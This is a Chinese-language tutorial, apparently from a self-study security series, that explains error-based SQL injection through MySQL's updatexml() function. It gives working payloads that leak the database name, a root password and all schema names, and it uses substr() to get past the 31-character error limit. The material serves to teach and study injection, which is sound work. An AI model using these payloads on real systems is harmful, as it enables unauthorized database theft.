updatexml报错注入原理分析

++《网络安全自学教程》++

SQL注入时,经常利用updatexml()的报错特性来脱库。

updatexml报错原理

updatexml() 的作用是修改xml文件的内容。

1、updatexml语法参数

updatexml(参数1,参数2,参数3)

  • 参数1: 文件名,比如 a.xm
  • 参数2:路径,比如 contry->city1
  • 参数3:替换的值内容,比如 tianjing

就是把 a.xm 文件中 contry->city1 标签的值改成 tianjing

2、报错原理分析

参数2 的路径必须符合 XML 的 Xpath 语法,否则就会报错,提示你语法错误,并且把报错位置的内容显示出来。

比如我给参数2一个特殊符号~,它就会把这个特殊符号显示出来。

​​​​​​​​​​​​

如果函数里还有函数,他就会先执行里面的那个函数,类似小学数学里提到的"先算括号内,再算括号外",利用这个特性,我们在updatexml()里插入别的函数。

sql 复制代码
select updatexml(1,concat('~',database()),3);
  1. 它会先执行最里面的 database() ,查看到前使用的数据库是test。
sql 复制代码
select updatexml(1,concat('~',test),3);
  1. 再执行 concat() ,拼接成~test
sql 复制代码
select updatexml(1,'~test',3);
  1. 再执行updatexml(),一看参数2是 ~test,不符合Xpath语法,就报语法错误,停止执行SQL,然后把报错位置的参数显示出来。像下图的执行结果那样,我们就拿到了当前使用的数据库。

3、使用updatexml()脱库

按照上一步的逻辑,在函数中再插入括号,括号里写SQL语句,就能执行任意SQL,比如:查看root用户的密码。

sql 复制代码
select updatexml(1,concat('~',
(select password from user where username='root')
),3);

插入脱库语法来脱裤。

sql 复制代码
select updatexml(1,
concat('~',(
select group_concat(schema_name) 
from information_schema.schemata
)),3);

这里大家能注意到,我文章中的SQL故意换行了,这个换行不是语法要求,是给你自己看的,否则嵌套这么多括号,很容易写错。

4、分割显示结果

updatexml() 显示的报错内容字符串,最大长度是31个字符。脱库的结果显示不全,我们可以用 substr() 截取不同位置的字符串,分别显示出来。

比如:从第1个字符开始,截取31个字符。

sql 复制代码
select updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata)
,1,31)
),3);

从第32个字符开始,截取31个字符。

sql 复制代码
select updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata)
,32,31)
),3);

直到显示完所有字符。

相关推荐
胡耀超6 分钟前
大数据平台安全指南——大数据平台安全架构全景:从认证授权到数据治理的企业级实践指南——认证、授权、审计、加密四大支柱
安全·数据治理·数据安全·权限管理·安全架构·hadoop生态·合规审计
MZZDX12 分钟前
MySQL相关知识总结
数据库·mysql
青山撞入怀11142 小时前
sql题目练习——聚合函数
数据库·sql
深盾科技2 小时前
C/C++逆向分析实战:变量的奥秘与安全防护
c语言·c++·安全
disanleya2 小时前
MySQL默认端口为何是3306?修改后如何管理?
数据库·mysql·adb
川石课堂软件测试5 小时前
MySQL数据库之DBA命令
数据库·网络协议·mysql·http·单元测试·prometheus·dba
ybb_ymm7 小时前
mysql8在linux下的默认规则修改
linux·运维·数据库·mysql
你的人类朋友7 小时前
“签名”这个概念是非对称加密独有的吗?
前端·后端·安全
倔强的石头_8 小时前
Navicat Premium 与金仓数据库融合实践:高效管理国产数据库新方案
数据库